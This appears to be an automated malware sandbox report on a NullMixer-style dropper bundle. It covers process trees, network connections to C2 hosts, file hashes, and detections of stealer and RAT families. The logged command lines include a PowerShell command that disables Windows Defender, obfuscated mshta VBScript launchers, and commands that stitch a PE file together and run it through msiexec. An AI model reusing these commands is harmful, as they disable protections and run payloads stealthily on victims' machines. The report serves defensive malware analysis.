C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe
Sat0619212f22dd7.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat060fd7e42d2.exe
Sat060fd7e42d2.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe
Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe
Sat0647140c100d63.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe
Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe
Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe
Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 272
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe
Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0675f75df01bdb.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """"== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Sat06f5ed0e3bb24.exe" /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sat0663b341399ee.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5""== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5"== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE( CREAteobjEcT( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " ,0 ,True ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ +6H87pFZ.4 +FDKD47Ef.I1+U56d.R+ JB946RB.I7A + Q_tW.pL+BTDIJ1.FYL+ FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 440
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
C:\Users\Admin\AppData\Local\Temp\f7871e5.exe
"C:\Users\Admin\AppData\Local\Temp\f7871e5.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 652
C:\Users\Admin\AppData\Local\Temp\f78aa43.exe
"C:\Users\Admin\AppData\Local\Temp\f78aa43.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 652
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | N/A | tcp |
| US | 8.8.8.8:53 | gazrxlog.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:49264 | N/A | tcp |
| N/A | 127.0.0.1:49268 | N/A | tcp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | N/A | tcp |
| FR | 91.121.67.60:23325 | N/A | tcp |
| US | 72.84.118.132:8080 | N/A | tcp |
| FR | 91.121.67.60:23325 | N/A | tcp |
| US | 72.84.118.132:8080 | N/A | tcp |
| FR | 91.121.67.60:23325 | N/A | tcp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| FR | 91.121.67.60:23325 | N/A | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| FR | 91.121.67.60:23325 | N/A | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libwinpthread-1.dll
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libgcc_s_dw2-1.dll
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libstdc++-6.dll
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat060fd7e42d2.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
| MD5 | 1cc8a64b178076dca421fedc3a248a56 |
| SHA1 | db8ed444965577dfb6db4f92ddd8d96a157ddea5 |
| SHA256 | 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345 |
| SHA512 | c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff |
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe
| MD5 | dd2fdd69b9db1cf5764dcfd429a1cf5e |
| SHA1 | c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8 |
| SHA256 | d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe |
| SHA512 | c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d |
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe
| MD5 | 854ea0bc0602795b95da3be8257c530f |
| SHA1 | f243a71edc902ed91d0f990630a73d0d01828c73 |
| SHA256 | c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e |
| SHA512 | 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c |
memory/1032-154-0x0000000000FD0000-0x0000000000FEA000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/1032-161-0x0000000000260000-0x0000000000266000-memory.dmp
memory/2896-160-0x00000000026D0000-0x00000000028D2000-memory.dmp
memory/1816-162-0x0000000002810000-0x000000000295C000-memory.dmp
memory/2812-172-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2812-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2812-170-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2812-169-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2812-167-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2812-163-0x0000000000400000-0x000000000051B000-memory.dmp
memory/2860-173-0x0000000000400000-0x0000000000883000-memory.dmp
memory/2896-175-0x0000000002CD0000-0x0000000002D75000-memory.dmp
memory/2896-179-0x0000000002D80000-0x0000000002E12000-memory.dmp
memory/2896-176-0x0000000002D80000-0x0000000002E12000-memory.dmp
memory/1816-181-0x0000000002810000-0x000000000295C000-memory.dmp
memory/2896-180-0x00000000026D0000-0x00000000028D2000-memory.dmp
memory/1656-194-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-192-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-191-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-190-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1656-188-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-186-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-184-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1656-182-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1816-196-0x0000000002CE0000-0x0000000002D85000-memory.dmp
memory/1816-200-0x0000000002D90000-0x0000000002E22000-memory.dmp
memory/1816-197-0x0000000002D90000-0x0000000002E22000-memory.dmp
memory/2896-202-0x0000000002D80000-0x0000000002E12000-memory.dmp
memory/2896-203-0x0000000002E20000-0x00000000038ED000-memory.dmp
memory/2896-204-0x0000000000930000-0x00000000009BB000-memory.dmp
memory/2896-205-0x00000000038F0000-0x0000000003976000-memory.dmp
memory/2896-208-0x00000000038F0000-0x0000000003976000-memory.dmp
memory/2896-206-0x00000000038F0000-0x0000000003976000-memory.dmp
memory/2896-210-0x00000000000A0000-0x00000000000A4000-memory.dmp
memory/2896-209-0x0000000000090000-0x0000000000091000-memory.dmp
memory/1816-217-0x0000000002D90000-0x0000000002E22000-memory.dmp
memory/1816-218-0x0000000002E30000-0x0000000003B71000-memory.dmp
memory/1816-219-0x0000000003B80000-0x0000000003C0B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\f7871e5.exe
| MD5 | a014b8961283f1e07d7f31ecdd7db62f |
| SHA1 | 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065 |
| SHA256 | 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89 |
| SHA512 | bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869 |
memory/2524-276-0x0000000000340000-0x0000000000348000-memory.dmp
memory/1572-293-0x0000000000D90000-0x0000000000D98000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2976 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe |
| PID 2976 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe |
| PID 2976 wrote to memory of 3808 | N/A | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"
C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe" -u
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1320 set thread context of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe |
| PID 2436 set thread context of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe |
| PID 1528 set thread context of 1544 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe | N/A |
